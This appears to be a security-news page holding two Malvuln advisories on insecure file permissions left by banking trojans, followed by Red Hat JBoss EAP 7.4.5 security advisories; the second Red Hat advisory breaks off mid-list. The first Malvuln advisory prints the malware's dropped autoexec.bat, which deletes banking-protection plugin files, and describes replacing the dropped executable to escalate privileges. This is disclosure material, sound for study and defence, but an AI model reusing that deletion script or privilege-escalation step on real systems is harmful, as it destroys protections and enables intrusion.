Trojan-Banker.Win32.Banbra.cyt malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/e0f2bee25dd103d92e91e895e313ec34.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan-Banker.Win32.Banbra.cytVulnerability: Insecure Permissions Description: The malware writes a batch script ".bat" file to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: BanbraType: PE32MD5: e0f2bee25dd103d92e91e895e313ec34Vuln ID: MVID-2022-0611Disclosure: 06/06/2022Exploit/PoC:C:\>cacls autoexec.batC:\autoexec.bat BUILTIN\Administrators:(ID)F                NT AUTHORITY\SYSTEM:(ID)F                BUILTIN\Users:(ID)R                NT AUTHORITY\Authenticated Users:(ID)CC:\>type autoexec.bat@echo offSET princix=delSET pasta1=c:\windows\downlo~1\gb*.*SET pasta2=c:\windows\downlo~1\*.g??SET pasta3=c:\windows\downlo~1\g*.*SET pasta4=c:\arquiv~1\GbPlugin\g*.*SET pasta5=c:\arquiv~1\GbPlugin\b*.*SET pasta6=c:\arquiv~1\GbPlugin\c*.*SET pasta55=c:\arquiv~1\GbPlugin\u*.*SET pasta7=c:\windows\downlo~1\Ab*.*SET pasta8=c:\windows\downlo~1\b*.*SET pasta9=c:\windows\downlo~1\Ab*.*SET pasta10=c:\progra~1\GbPlugin\g*.*SET pasta11=c:\progra~1\GbPlugin\b*.*SET pasta12=c:\progra~1\GbPlugin\c*.*SET pasta56=c:\progra~1\GbPlugin\u*.*SET pasta13=C:\progra~1\Scpad\s*.*SET pasta14=c:\arquiv~1\Scpad\s*.*SET pasta15=C:\WINDOWS\system32\scpsssh*.*%princix% %pasta1%%princix% %pasta2%%princix% %pasta3%%princix% %pasta4%%princix% %pasta5%%princix% %pasta6%%princix% %pasta7%%princix% %pasta8%%princix% %pasta9%%princix% %pasta10%%princix% %pasta11%%princix% %pasta12%%princix% %pasta13%%princix% %pasta14%%princix% %pasta15%%princix% %pasta55%%princix% %pasta56%C:\>C:\>dir autoexec.bat Volume in drive C has no label. Directory of C:\05/24/2022  02:26 AM             1,028 autoexec.bat               1 File(s)          1,028 bytes               0 Dir(s)  24,498,929,664 bytes freeDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan-Banker.Win32.Banbra.cyt MVID-2022-0611 Insecure Permissions

Trojan-Banker.Win32.Banker.agzg malware suffers from an insecure permissions vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source:https://malvuln.com/advisory/ef1e59148c9a902ae5454760aaab73fe.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan-Banker.Win32.Banker.agzgVulnerability: Insecure PermissionsDescription: The malware writes a PE file to c drive granting change (C)permissions to the authenticated user group. Standard users can rename theexecutable dropped by the malware to disable it or replace it with theirown executable. Then wait for a privileged user to logon to the infectedmachine to potentially escalate privileges.Family: BankerType: PE32MD5: ef1e59148c9a902ae5454760aaab73feVuln ID: MVID-2022-0608Disclosure: 06/06/2022Exploit/PoC:C:\>cacls tuto.exeC:\tuto.exe BUILTIN\Administrators:(ID)F            NT AUTHORITY\SYSTEM:(ID)F            BUILTIN\Users:(ID)R            NT AUTHORITY\Authenticated Users:(ID)CC:\>dir tuto.exe Volume in drive C has no label. Directory of C:\05/04/2022  02:56 AM            14,336 tuto.exe               1 File(s)         14,336 bytesDisclaimer: The information contained within this advisory is supplied"as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory,provided that it is not altered except by reformatting it, and that duecredit is given. Permission is explicitly given for insertion invulnerability databases and similar, provided that due credit is given tothe author. The author is not responsible for any misuse of the informationcontained herein and accepts no responsibility for any damage caused by theuse or misuse of this information. The author prohibits any malicious useof security related information or exploits by the author or elsewhere. Donot attempt to download Malware samples. The author of this website takesno responsibility for any kind of damages occurring from improper Malwarehandling or the downloading of ANY Malware mentioned on this website orelsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan-Banker.Win32.Banker.agzg MVID-2022-0608 Insecure Permissions

Red Hat Security Advisory 2022-4919-01 - Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 7.4.5 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.4 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.5 Release Notes for information about the most significant bug fixes and enhancements included in this release. Issues addressed include HTTP request smuggling, code execution, denial of service, memory leak, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update on RHEL 8  
Advisory ID:       RHSA-2022:4919-01  
Product:           Red Hat JBoss Enterprise Application Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4919  
Issue date:        2022-06-06  
CVE Names:         CVE-2020-36518 CVE-2021-37136 CVE-2021-37137  
                   CVE-2021-42392 CVE-2021-43797 CVE-2022-0084  
                   CVE-2022-0853 CVE-2022-0866 CVE-2022-1319  
                   CVE-2022-21299 CVE-2022-21363 CVE-2022-23221  
                   CVE-2022-23437 CVE-2022-23913 CVE-2022-24785  
====================================================================  
1. Summary:

A security update is now available for Red Hat JBoss Enterprise Application  
Platform 7.4 for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss EAP 7.4 for RHEL 8 - noarch, x86_64

3. Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java  
applications based on the WildFly application runtime.

This release of Red Hat JBoss Enterprise Application Platform 7.4.5 serves  
as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.4  
and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise  
Application Platform 7.4.5 Release Notes for information about the most  
significant bug fixes and enhancements included in this release.

Security Fix(es):

* h2: Loading of custom classes from remote servers through JNDI  
(CVE-2022-23221)

* jackson-databind: denial of service via a large depth of nested objects  
(CVE-2020-36518)

* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for  
decompressed data (CVE-2021-37136)

* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may  
buffer skippable chunks in an unnecessary way (CVE-2021-37137)

* h2: Remote Code Execution in Console (CVE-2021-42392)

* netty: control chars in header names may lead to HTTP request smuggling  
(CVE-2021-43797)

* xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of  
stderr (CVE-2022-0084)

* wildfly: Wildfly management of EJB Session context returns wrong caller  
principal with Elytron Security enabled (CVE-2022-0866)

* undertow: Double AJP response for 400 from EAP 7 results in CPING  
failures (CVE-2022-1319)

* OpenJDK: Infinite loop related to incorrect handling of newlines in  
XMLEntityScanner (JAXP, 8270646) (CVE-2022-21299)

* mysql-connector-java: Difficult to exploit vulnerability allows high  
privileged attacker with network access via multiple protocols to  
compromise MySQL Connectors (CVE-2022-21363)

* xerces-j2: infinite loop when handling specially crafted XML document  
payloads (CVE-2022-23437)

* artemis-commons: Apache ActiveMQ Artemis DoS (CVE-2022-23913)

* Moment.js: Path traversal in moment.locale (CVE-2022-24785)

* jboss-client: memory leakage in remote client transaction (CVE-2022-0853)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise  
Application Platform installation and deployed applications.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data  
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way  
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling  
2039403 - CVE-2021-42392 h2: Remote Code Execution in Console  
2041472 - CVE-2022-21299 OpenJDK: Infinite loop related to incorrect handling of newlines in XMLEntityScanner (JAXP, 8270646)  
2044596 - CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI  
2047200 - CVE-2022-23437 xerces-j2: infinite loop when handling specially crafted XML document payloads  
2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors  
2060725 - CVE-2022-0853 jboss-client: memory leakage in remote client transaction  
2060929 - CVE-2022-0866 wildfly: Wildfly management of EJB Session context returns wrong caller principal with Elytron Security enabled  
2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS  
2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr  
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2073890 - CVE-2022-1319 undertow: Double AJP response for 400 from EAP 7 results in CPING failures

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-23121 - Tracker bug for the EAP 7.4.5 release for RHEL-8  
JBEAP-23171 - (7.4.z) Upgrade HAL from 3.3.9.Final-redhat-00001 to 3.3.12.Final-redhat-00001  
JBEAP-23194 - Upgrade hibernate-validator from 6.0.22.Final-redhat-00002 to 6.0.23-redhat-00001  
JBEAP-23241 - [GSS](7.4.z) Upgrade jberet from 1.3.9 to 1.3.9.SP1  
JBEAP-23299 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00034 to 2.16.0.redhat-00042  
JBEAP-23300 - [GSS](7.4.z) Upgrade JBoss Remoting from 5.0.23.SP1 to 5.0.24.SP1  
JBEAP-23312 - (7.4.z) Upgrade WildFly Core from 15.0.8.Final-redhat-00001 to 15.0.12.Final-redhat-00001  
JBEAP-23313 - (7.4.z) Upgrade Elytron from 1.15.11.Final-redhat-00002 to 1.15.12.Final-redhat-00001  
JBEAP-23336 - (7.4.z) Upgrade Hibernate ORM from 5.3.25.Final-redhat-00002 to 5.3.26.Final-redhat-00002  
JBEAP-23338 - [GSS](7.4.z) Upgrade Undertow from 2.2.16 to 2.2.17.SP3  
JBEAP-23339 - [GSS](7.4.z) Upgrade wildfly-http-ejb-client from 1.1.10 to 1.1.11.SP1  
JBEAP-23351 - (7.4.z) Upgrade org.apache.logging.log4j from 2.17.1.redhat-00001 to 2.17.1.redhat-00002  
JBEAP-23353 - (7.4.z) Upgrade wildfly-transaction-client from 1.1.14.Final-redhat-00001 to 1.1.15.Final-redhat-x  
JBEAP-23429 - [PM](7.4.z) JDK17 Update Tested Configurations page and make note in Update release notes  
JBEAP-23432 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP04 to 3.0.0.SP05  
JBEAP-23451 - [PST] (7.4.z) Upgrade to FasterXML Jackson to  2.12.6.redhat-00001 and Jackson Databind to 2.12.6.1.redhat-00003  
JBEAP-23531 - [GSS](7.4.z) Upgrade Undertow from 2.2.17.SP3 to 2.2.17.SP4  
JBEAP-23532 - (7.4.z) Upgrade WildFly Core from 15.0.12.Final-redhat-00001 to 15.0.13.Final-redhat-00001

7. Package List:

Red Hat JBoss EAP 7.4 for RHEL 8:

Source:  
eap7-activemq-artemis-2.16.0-9.redhat_00042.1.el8eap.src.rpm  
eap7-h2database-1.4.197-2.redhat_00004.1.el8eap.src.rpm  
eap7-hal-console-3.3.12-1.Final_redhat_00001.1.el8eap.src.rpm  
eap7-hibernate-5.3.26-1.Final_redhat_00002.2.el8eap.src.rpm  
eap7-hibernate-validator-6.0.23-1.Final_redhat_00001.1.el8eap.src.rpm  
eap7-jackson-annotations-2.12.6-1.redhat_00001.1.el8eap.src.rpm  
eap7-jackson-core-2.12.6-1.redhat_00001.1.el8eap.src.rpm  
eap7-jackson-databind-2.12.6.1-1.redhat_00003.1.el8eap.src.rpm  
eap7-jackson-jaxrs-providers-2.12.6-1.redhat_00001.1.el8eap.src.rpm  
eap7-jackson-modules-base-2.12.6-1.redhat_00001.1.el8eap.src.rpm  
eap7-jackson-modules-java8-2.12.6-1.redhat_00001.1.el8eap.src.rpm  
eap7-jberet-1.3.9-1.SP1_redhat_00001.1.el8eap.src.rpm  
eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP05_redhat_00002.1.el8eap.src.rpm  
eap7-jboss-remoting-5.0.24-1.SP1_redhat_00001.1.el8eap.src.rpm  
eap7-jboss-server-migration-1.10.0-16.Final_redhat_00015.1.el8eap.src.rpm  
eap7-jboss-xnio-base-3.8.7-1.SP1_redhat_00001.1.el8eap.src.rpm  
eap7-log4j-2.17.1-2.redhat_00002.1.el8eap.src.rpm  
eap7-netty-4.1.72-4.Final_redhat_00001.1.el8eap.src.rpm  
eap7-netty-tcnative-2.0.48-1.Final_redhat_00001.1.el8eap.src.rpm  
eap7-netty-transport-native-epoll-4.1.72-1.Final_redhat_00001.1.el8eap.src.rpm  
eap7-snakeyaml-1.29.0-1.redhat_00001.2.el8eap.src.rpm  
eap7-undertow-2.2.17-2.SP4_redhat_00001.1.el8eap.src.rpm  
eap7-wildfly-7.4.5-3.GA_redhat_00001.1.el8eap.src.rpm  
eap7-wildfly-elytron-1.15.12-1.Final_redhat_00001.1.el8eap.src.rpm  
eap7-wildfly-http-client-1.1.11-1.SP1_redhat_00001.1.el8eap.src.rpm  
eap7-wildfly-transaction-client-1.1.15-1.Final_redhat_00001.1.el8eap.src.rpm  
eap7-xerces-j2-2.12.0-3.SP04_redhat_00001.1.el8eap.src.rpm

noarch:  
eap7-activemq-artemis-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-cli-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-commons-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-core-client-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-dto-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-hornetq-protocol-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-hqclient-protocol-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-jdbc-store-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-jms-client-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-jms-server-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-journal-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-ra-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-selector-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-server-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-service-extensions-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-activemq-artemis-tools-2.16.0-9.redhat_00042.1.el8eap.noarch.rpm  
eap7-h2database-1.4.197-2.redhat_00004.1.el8eap.noarch.rpm  
eap7-hal-console-3.3.12-1.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-hibernate-5.3.26-1.Final_redhat_00002.2.el8eap.noarch.rpm  
eap7-hibernate-core-5.3.26-1.Final_redhat_00002.2.el8eap.noarch.rpm  
eap7-hibernate-entitymanager-5.3.26-1.Final_redhat_00002.2.el8eap.noarch.rpm  
eap7-hibernate-envers-5.3.26-1.Final_redhat_00002.2.el8eap.noarch.rpm  
eap7-hibernate-java8-5.3.26-1.Final_redhat_00002.2.el8eap.noarch.rpm  
eap7-hibernate-validator-6.0.23-1.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-hibernate-validator-cdi-6.0.23-1.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-annotations-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-core-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-databind-2.12.6.1-1.redhat_00003.1.el8eap.noarch.rpm  
eap7-jackson-datatype-jdk8-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-datatype-jsr310-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-jaxrs-base-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-jaxrs-json-provider-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-module-jaxb-annotations-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-modules-base-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jackson-modules-java8-2.12.6-1.redhat_00001.1.el8eap.noarch.rpm  
eap7-jberet-1.3.9-1.SP1_redhat_00001.1.el8eap.noarch.rpm  
eap7-jberet-core-1.3.9-1.SP1_redhat_00001.1.el8eap.noarch.rpm  
eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP05_redhat_00002.1.el8eap.noarch.rpm  
eap7-jboss-remoting-5.0.24-1.SP1_redhat_00001.1.el8eap.noarch.rpm  
eap7-jboss-server-migration-1.10.0-16.Final_redhat_00015.1.el8eap.noarch.rpm  
eap7-jboss-server-migration-cli-1.10.0-16.Final_redhat_00015.1.el8eap.noarch.rpm  
eap7-jboss-server-migration-core-1.10.0-16.Final_redhat_00015.1.el8eap.noarch.rpm  
eap7-jboss-xnio-base-3.8.7-1.SP1_redhat_00001.1.el8eap.noarch.rpm  
eap7-log4j-2.17.1-2.redhat_00002.1.el8eap.noarch.rpm  
eap7-netty-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-all-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-buffer-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-dns-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-haproxy-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-http-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-http2-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-memcache-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-mqtt-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-redis-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-smtp-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-socks-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-stomp-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-codec-xml-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-common-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-handler-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-handler-proxy-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-resolver-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-resolver-dns-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-resolver-dns-classes-macos-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-tcnative-2.0.48-1.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-transport-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-transport-classes-epoll-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-transport-classes-kqueue-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-transport-native-unix-common-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-transport-rxtx-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-transport-sctp-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-netty-transport-udt-4.1.72-4.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-snakeyaml-1.29.0-1.redhat_00001.2.el8eap.noarch.rpm  
eap7-undertow-2.2.17-2.SP4_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-7.4.5-3.GA_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-elytron-1.15.12-1.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-elytron-tool-1.15.12-1.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-http-client-common-1.1.11-1.SP1_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-http-ejb-client-1.1.11-1.SP1_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-http-naming-client-1.1.11-1.SP1_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-http-transaction-client-1.1.11-1.SP1_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-javadocs-7.4.5-3.GA_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-modules-7.4.5-3.GA_redhat_00001.1.el8eap.noarch.rpm  
eap7-wildfly-transaction-client-1.1.15-1.Final_redhat_00001.1.el8eap.noarch.rpm  
eap7-xerces-j2-2.12.0-3.SP04_redhat_00001.1.el8eap.noarch.rpm

x86_64:  
eap7-netty-transport-native-epoll-4.1.72-1.Final_redhat_00001.1.el8eap.x86_64.rpm  
eap7-netty-transport-native-epoll-debuginfo-4.1.72-1.Final_redhat_00001.1.el8eap.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2021-37136  
https://access.redhat.com/security/cve/CVE-2021-37137  
https://access.redhat.com/security/cve/CVE-2021-42392  
https://access.redhat.com/security/cve/CVE-2021-43797  
https://access.redhat.com/security/cve/CVE-2022-0084  
https://access.redhat.com/security/cve/CVE-2022-0853  
https://access.redhat.com/security/cve/CVE-2022-0866  
https://access.redhat.com/security/cve/CVE-2022-1319  
https://access.redhat.com/security/cve/CVE-2022-21299  
https://access.redhat.com/security/cve/CVE-2022-21363  
https://access.redhat.com/security/cve/CVE-2022-23221  
https://access.redhat.com/security/cve/CVE-2022-23437  
https://access.redhat.com/security/cve/CVE-2022-23913  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYp5p/9zjgjWX9erEAQhL+g/+JKQHaiLkO+ltEKRh+4gMrTSp6RHQ7abn  
2sNL4RWYPNRMVkzxxssvhNORYq9zEpwygmoNbsWDgPAJfoHR4QJingjL2fTn8Q7+  
T3Iw/kw3OH9wAnWhBl1uppLzYbLqppjC6Z3/BdU6uqMjly+wQyoIgEm2eHMgAMnQ  
SteQlaYDrVuu9+8b57EcKVGVyg6x7W/DDX0hWCxNh7zFx8kX+kOdM4JBARMVTz8c  
JfXxaNbP5cr2pWxXyCOSPgLku9P7wV5zZ1Mi2bS9m+wWndhlmnGDRE7EBJZltKz4  
NudGSOpabgN7g0WMLZLRQg6ioCsaawucV7UZqk6Sxf0ur7WCif8z2Y5NR8gD+usI  
ed5HVhMjF8Uj1+hzvJttTeoRZ9sVigQ3SeOxnQhK3G+n/d5jk7TCe8EdlW/MHq/G  
EDud/taB/GO7imnhdHLEyA+P4BVhqpbw47AvyQq0cRgYfDGwK09Z7HkxzWxz7zbk  
vP1eKJ6Wc8B94WBMIB50eObTVoT98VBzQ5gUTrfcwIjTDCWMqkT6HyOWfQGCPF/j  
4TWRrA3/n4ZkVrk/K5N1BLT07XuCV+dF/JfjHzG7piA0fU5gyOyn3GlU3cKHPBT7  
1OALl1P0Bs1lFIaVxyxWyU0IcLTD0ndvoed5N+j5wrMgn8QaIpFk9ByfJrw8KIJX  
TdWh+RTMxwU=Q04c  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4919-01

Red Hat Security Advisory 2022-4918-01 - Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 7.4.5 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.4 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.5 Release Notes for information about the most significant bug fixes and enhancements included in this release. Issues addressed include HTTP request smuggling, code execution, denial of service, memory leak, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update on RHEL 7  
Advisory ID:       RHSA-2022:4918-01  
Product:           Red Hat JBoss Enterprise Application Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4918  
Issue date:        2022-06-06  
CVE Names:         CVE-2020-36518 CVE-2021-37136 CVE-2021-37137  
                   CVE-2021-42392 CVE-2021-43797 CVE-2022-0084  
                   CVE-2022-0853 CVE-2022-0866 CVE-2022-1319  
                   CVE-2022-21299 CVE-2022-21363 CVE-2022-23221  
                   CVE-2022-23437 CVE-2022-23913 CVE-2022-24785  
====================================================================  
1. Summary:

A security update is now available for Red Hat JBoss Enterprise Application  
Platform 7.4 for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss EAP 7.4 for RHEL 7 Server - noarch, x86_64

3. Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java  
applications based on the WildFly application runtime.

This release of Red Hat JBoss Enterprise Application Platform 7.4.5 serves  
as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.4  
and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise  
Application Platform 7.4.5 Release Notes for information about the most  
significant bug fixes and enhancements included in this release.

Security Fix(es):

* h2: Loading of custom classes from remote servers through JNDI  
(CVE-2022-23221)

* jackson-databind: denial of service via a large depth of nested objects  
(CVE-2020-36518)

* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for  
decompressed data (CVE-2021-37136)

* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may  
buffer skippable chunks in an unnecessary way (CVE-2021-37137)

* h2: Remote Code Execution in Console (CVE-2021-42392)

* netty: control chars in header names may lead to HTTP request smuggling  
(CVE-2021-43797)

* xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of  
stderr (CVE-2022-0084)

* wildfly: Wildfly management of EJB Session context returns wrong caller  
principal with Elytron Security enabled (CVE-2022-0866)

* undertow: Double AJP response for 400 from EAP 7 results in CPING  
failures (CVE-2022-1319)

* OpenJDK: Infinite loop related to incorrect handling of newlines in  
XMLEntityScanner (JAXP, 8270646) (CVE-2022-21299)

* mysql-connector-java: Difficult to exploit vulnerability allows high  
privileged attacker with network access via multiple protocols to  
compromise MySQL Connectors (CVE-2022-21363)

* xerces-j2: infinite loop when handling specially crafted XML document  
payloads (CVE-2022-23437)

* artemis-commons: Apache ActiveMQ Artemis DoS (CVE-2022-23913)

* Moment.js: Path traversal in moment.locale (CVE-2022-24785)

* jboss-client: memory leakage in remote client transaction (CVE-2022-0853)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise  
Application Platform installation and deployed applications.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data  
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way  
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling  
2039403 - CVE-2021-42392 h2: Remote Code Execution in Console  
2041472 - CVE-2022-21299 OpenJDK: Infinite loop related to incorrect handling of newlines in XMLEntityScanner (JAXP, 8270646)  
2044596 - CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI  
